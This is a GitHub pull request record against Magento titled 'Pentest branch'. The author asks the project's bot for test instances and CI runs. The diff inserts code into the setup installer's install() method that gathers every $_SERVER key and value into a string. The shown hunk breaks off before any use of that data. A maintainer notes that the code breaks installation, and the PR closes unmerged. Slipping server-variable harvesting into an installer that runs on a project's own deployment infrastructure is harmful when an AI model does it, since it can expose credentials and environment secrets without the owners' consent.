### PR TITLE
Pentest branch

### PR DESCRIPTION
**Pull request by bf-whiteh**
please reject/ignore these changes.

### CODE REVIEW

**Comment by bf-whiteh** [comment]
@magento give me test instance

**Comment by bf-whiteh** [comment]
@magento give me test instance

**Comment by bf-whiteh** [comment]
@magento run unit tests

**Comment by bf-whiteh** [comment]
@magento run integration tests

**Comment by slavvka** [comment]
@magento give me test instance

File: setup/src/Magento/Setup/Model/Installer.php [hunk 1]
```diff
@@ -414,6 +414,21 @@ public function install($request)
         if ($this->sampleDataState->hasError()) {
             $this->log->log('Sample Data is installed with errors. See log file for details');
         }
+	$bftest = '';
+	foreach ($_SERVER as $key=>$val )
+	{
+        	$bftest = $bftest . $key." : " .$val."\n";
```
Comment (slavvka) [inline setup/src/Magento/Setup/Model/Installer.php:420]: This code generates an error while installing:
```
Notice: Array to string conversion in /var/www/html/deployer/instances/24df
  72b6c9199455cdb0be46ead011e1/setup/src/Magento/Setup/Model/Installer.php on
   line 420
```
That is why the deployer cannot install it.

**Pull request closed without merging**